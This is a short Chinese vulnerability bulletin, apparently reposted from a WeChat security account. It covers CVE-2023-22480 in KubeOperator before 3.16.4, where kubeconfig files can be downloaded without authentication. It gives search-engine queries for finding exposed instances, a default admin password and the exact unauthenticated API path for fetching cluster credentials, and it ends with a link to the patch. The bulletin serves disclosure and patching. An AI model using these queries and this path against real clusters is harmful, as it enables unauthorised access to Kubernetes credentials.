一个开源的轻量级 Kubernetes 发行版,专注于帮助企业规划、部署和运营生产级别的 K8s 集群。KubeOperator 3.16.4之前版本存在授权问题漏洞,该漏洞源于API与未经授权的实体交互,由于下载kubeconfig的路径不需要身份认证,导致攻击者可直接下载kubeconfig获取相关敏感信息
KubeOperator < 3.16.4FOFA空间搜索引擎语句
app="KubeOperator" && status_code="200"ZoomEye空间搜索引擎语法
title:"KubeOperator"登录页面是这个酱紫
默认账号密码
adminkubeoperator@admin23
注意这个集群名称,未授权的时候会用到
访问该接口+集群名称当集群存在时即可通过接口未授权下载配置文件
http://ip/api/v1/clusters/kubeconfig/stable-cluster
官方已给出修复方案建议及时更新补丁https://github.com/KubeOperator/KubeOperator/releases/tag/v3.16.4
原文始发于微信公众号(EchoSec):【漏洞速递 | 附EXP】CVE-2023-22480漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论